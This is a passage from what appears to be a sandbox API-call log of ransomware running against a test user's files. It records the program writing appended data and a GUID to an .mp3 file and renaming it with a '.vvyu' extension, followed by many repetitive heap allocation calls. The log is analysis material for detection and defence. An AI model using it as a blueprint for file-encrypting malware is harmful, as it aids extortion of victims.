hHeap=0x2c0000) returned 1 [0195.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.413] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x6c0e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x6c0e, lpOverlapped=0x0) returned 1 [0195.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.414] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6c13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.414] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.415] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.416] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.416] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.416] CloseHandle (hObject=0x584) returned 1 [0195.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0195.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0195.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0195.418] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\sTzvqONg_kzYduboTTT.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\stzvqong_kzydubottt.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\sTzvqONg_kzYduboTTT.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\stzvqong_kzydubottt.mp3.vvyu")) returned 1 [0195.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.421] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.423] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbef3680, ftCreationTime.dwHighDateTime=0x1d8a637, ftLastAccessTime.dwLowDateTime=0x61898110, ftLastAccessTime.dwHighDateTime=0x1d8a6c1, ftLastWriteTime.dwLowDateTime=0x61898110, ftLastWriteTime.dwHighDateTime=0x1d8a6c1, nFileSizeHigh=0x0, nFileSizeLow=0x6c13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sTzvqONg_kzYduboTTT.mp3", cAlternateFileName="STZVQO~1.MP3")) returned 0 [0195.423] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0195.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0195.424] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0195.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0195.424] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0195.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0195.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0195.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.455] 